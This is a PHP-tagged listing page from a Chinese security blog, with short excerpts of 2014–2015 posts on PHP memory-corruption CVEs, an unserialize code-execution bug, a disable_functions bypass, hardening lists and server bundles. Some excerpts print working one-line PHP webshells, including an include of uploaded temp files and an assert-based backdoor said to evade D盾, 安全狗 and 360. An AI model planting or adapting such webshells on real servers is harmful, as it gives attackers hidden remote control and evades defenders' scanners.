PHP中的内存破坏漏洞利用(CVE-2014-8142和CVE-2015-0231)

admin 发布于 2015-02-11 04:56
作者:Cigital公司的安全顾问Qsl1pknotp 题目:Exploiting memory corruption bugs in PHP (CVE-2014-8142 and CVE-2015-0231) Part 1 地址:http://www.inulledmyself.com/2015/02/exploiting...
标签: php 内存破坏
评论(0) 浏览(28627)

PHP 5.6.4 out of bounds read crashes php-cgi

admin 发布于 2015-01-06 02:36
----------- I cloned the php git repo on 12/16/2014 and built from source using the afl-gcc compiler: CC=/path/to/afl-gcc ./configure AFL_HARDEN=1 make PHP 7.0.0-dev (cgi-fcgi) (...
标签: php
评论(0) 浏览(11328)

PHP 5.6.3 unserialize() execute arbitrary code

admin 发布于 2014-12-29 06:35
Description: ------------ Reported by Stefan Esser <stefan.esser@sektioneins.de>: A while ago the function "process_nested_data" was changed to better handle objec...
标签: php unserialize
评论(0) 浏览(15198)

PHP Execute Command Bypass Disable_functions

admin 发布于 2014-11-18 14:33
先简单说一下php调用mail()函数的过程。 看到源码ext/mail.c 236行: char *sendmail_path = INI_STR("sendmail_path"); char *sendmail_cmd = NULL; 从INI中获得sendmail_path变量。我们看看php.ini里...
标签: php disable_functions 绕过
评论(1) 浏览(13009)

另类PHP一句话小马

admin 发布于 2014-11-08 10:25
利用了include可以把任何文件当php来解释的特性, 当我们上传一个文件的时候,会在服务器上生成一个临时文件,而$_FILES这个变量里面正好保存了这个文件的路径,所以可以直接include进来。 <?php @include($_FILES['u']['tmp_name']); <?php @include($_FILES['u...
标签: php 一句话木马 小马
评论(4) 浏览(17110)

php一句话木马过D盾,安全狗,360

admin 发布于 2014-10-19 11:47
D盾,他不认识二维数组,所以就很轻松绕过了。  对了 还有360哦~  测试了下安全狗,也查不出来,,。 <?php $item['wind'] = 'assert'; $array[] = $item; $array[0]['wind']($_POST['whirlwind']); //密码whirlwi...
标签: 安全狗 php 一句话 D盾
评论(1) 浏览(11612)

PHP中使用按位取反(~)函数创建后门,编码变异类后门!免杀绕过防火墙

admin 发布于 2014-08-23 07:27
.::PHP中使用按位取反(~)函数创建后门::. We enjoy hacking of life in day and night. _______________________________________________ [+] Author: Evi1m0 <evi1m0.bat#gmail.com> [+] Team: FF0...
标签: 免杀 php php免杀
评论(0) 浏览(13642)

禁用PHP危险函数(disable_functions)

admin 发布于 2014-08-08 02:23
phpinfo() 功能描述:输出 PHP 环境信息以及相关的模块、WEB 环境等信息。 危险等级:中 passthru() 功能描述:允许执行一个外部程序并回显输出,类似于 exec()。 危险等级:高 exec() 功能描述:允许执行一个外部程序(如 UNIX Shell 或 CMD 命令等)。 危险等级:高 system() ...
标签: php disable_functions 危险函数
评论(0) 浏览(13112)

自己整合的wamp,现在我用的就是

admin 发布于 2014-06-16 13:15
自己整合的apache2.2+mysql5.1+php5.3 由于时间久了 mysql只更新到5.1 有需要的可以自己换一下 直接解压到D盘就可以用了 如果需要其他盘的直接修改下mysql,apache,php的路径就行了 禁用了php的一些危险函数,apache启用了php的open_basedir限制了php...
标签: apache php mysql 整合 降权
评论(0) 浏览(13552)

让天下没有难配的php环境 phpStudy

admin 发布于 2014-06-06 13:30
目标:让天下没有难配的php环境。 phpStudy Linux版&Win版同步上线 支持Apache/Nginx/Tengine/Lighttpd/IIS7/8/6 『软件简介』 该程序包集成最新的Apache+Nginx+LightTPD+PHP+MySQL+phpMyAdmin+Zend Optimizer+Zend Lo...
标签: apache php 环境 nginx iis phpStudy
评论(0) 浏览(13643)

感谢9年的陪伴,江湖再见!!!

标签

热门文章

链接